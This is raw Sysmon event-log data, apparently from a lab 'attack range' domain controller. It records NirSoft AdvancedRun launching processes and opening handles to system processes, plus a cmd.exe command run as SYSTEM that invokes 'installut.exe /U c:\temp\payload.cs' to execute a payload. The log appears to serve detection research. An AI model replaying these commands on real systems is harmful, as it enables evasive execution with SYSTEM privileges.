734700x80000000000000004067379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.595{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 
(rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.594{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.593{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.593{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004067375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.592{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.592{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.591{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004067372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.588{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004067371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.586{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
m.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004067370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.579{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with 
different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004063702Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.939{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004063697Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.932{834264DD-11B5-61EB-1808-000000002702}1824C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c c:\temp\installut.exe /logfile= /LogToConsole=false /U c:\temp\payload.csC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004063696Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.930{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004063695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.930{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004063694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.929{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063693Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.929{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063692Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.927{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063691Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.927{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.926{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.925{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.925{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.924{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.924{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
